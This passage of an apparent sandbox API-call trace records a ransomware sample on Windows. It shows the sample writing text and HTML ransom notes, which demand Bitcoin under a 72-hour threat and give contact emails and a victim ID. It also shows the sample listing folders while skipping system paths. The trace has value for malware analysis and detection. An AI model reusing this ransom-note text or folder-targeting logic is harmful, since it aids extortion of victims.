	[0180.717] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0180.717] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0180.717] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0180.717] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads"
	[0180.718] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Downloads\\*.*") returned="C:\\Users\\Public\\Downloads\\*.*"
	[0180.718] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.718] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.718] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Downloads\\HELP_DECRYPT_YOUR_FILES.TXT") returned 53
	[0180.718] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\downloads\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.725] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.725] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.727] CloseHandle (hObject=0x380) returned 1
	[0180.727] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.728] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.729] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.729] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\downloads\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.729] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.729] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.730] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.730] CloseHandle (hObject=0x380) returned 1
	[0180.730] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.730] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.730] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.730] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Downloads\\HELP_DECRYPT_YOUR_FILES.HTML") returned 54
	[0180.730] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\downloads\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.735] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.735] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.738] CloseHandle (hObject=0x380) returned 1
	[0180.738] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.738] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.739] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.739] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.740] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.740] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\downloads\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.740] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.740] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.740] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.741] CloseHandle (hObject=0x380) returned 1
	[0180.741] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*.*" (normalized: "c:\\users\\public\\downloads\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x85406a7f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0180.741] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\*.*") returned 29
	[0180.741] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.741] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Downloads\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\public\\downloads\\*.*") returned 0x1d
	[0180.741] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.742] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="windows") returned 0x0
	[0180.742] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.742] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="boot") returned 0x0
	[0180.742] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.742] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="system volume information") returned 0x0
	[0180.742] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.742] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.742] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.743] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="temp") returned 0x0
	[0180.743] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.743] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="program files") returned 0x0
	[0180.743] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.743] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.743] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.743] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="appdata") returned 0x0
	[0180.743] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.744] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="application data") returned 0x0
	[0180.744] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.744] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="winnt") returned 0x0
	[0180.744] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.744] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="tmp") returned 0x0
	[0180.744] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.744] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="cache") returned 0x0
	[0180.744] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.745] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.745] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.745] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="webcache") returned 0x0
	[0180.745] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.745] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="inetcache") returned 0x0
	[0180.745] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.745] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="nvidia") returned 0x0
	[0180.745] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.745] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="packages") returned 0x0
	[0180.746] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.746] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="cookies") returned 0x0
	[0180.746] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.746] StrStrW (lpFirst="c:\\users\\public\\downloads\\*.*", lpSrch="programdata") returned 0x0
	[0180.746] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.746] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.746] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x85406a7f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.746] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.747] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.747] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85406a7f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85406a7f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8542cbe4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.747] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85406a7f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85406a7f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85406a7f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.747] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85406a7f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85406a7f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85406a7f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.747] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0180.747] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0180.747] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85132167, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85132167, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85157ef1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.748] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85132167, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85132167, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85132167, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.748] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1
	[0180.748] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1
	[0180.748] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1
	[0180.748] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.748] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.748] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries"
	[0180.748] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries"
	[0180.748] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\"
	[0180.748] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Public\\Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\"
	[0180.749] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Libraries\\*.*") returned="C:\\Users\\Public\\Libraries\\*.*"
	[0180.749] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*.*" (normalized: "c:\\users\\public\\libraries\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0180.749] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\*.*") returned 29
	[0180.749] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.749] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Libraries\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\public\\libraries\\*.*") returned 0x1d
	[0180.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.750] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="windows") returned 0x0
	[0180.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.750] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="boot") returned 0x0
	[0180.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.750] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="system volume information") returned 0x0
	[0180.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.750] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.756] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="temp") returned 0x0
	[0180.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.757] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="program files") returned 0x0
	[0180.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.757] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.757] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="appdata") returned 0x0
	[0180.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.757] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="application data") returned 0x0
	[0180.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.758] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="winnt") returned 0x0
	[0180.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.758] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="tmp") returned 0x0
	[0180.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.758] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="cache") returned 0x0
	[0180.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.758] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.759] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.759] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="webcache") returned 0x0
	[0180.759] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.759] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="inetcache") returned 0x0
	[0180.759] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.759] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="nvidia") returned 0x0
	[0180.759] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.759] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="packages") returned 0x0
	[0180.759] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.760] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="cookies") returned 0x0
	[0180.760] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.760] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="programdata") returned 0x0
	[0180.760] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.760] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.760] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0180.760] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0180.760] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\"
	[0180.761] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Libraries\\desktop.ini") returned="C:\\Users\\Public\\Libraries\\desktop.ini"
	[0180.761] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37
	[0180.761] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.761] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Libraries\\desktop.ini", cchLength=0x25 | out: lpsz="c:\\users\\public\\libraries\\desktop.ini") returned 0x25
	[0180.761] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.761] StrStrW (lpFirst="c:\\users\\public\\libraries\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
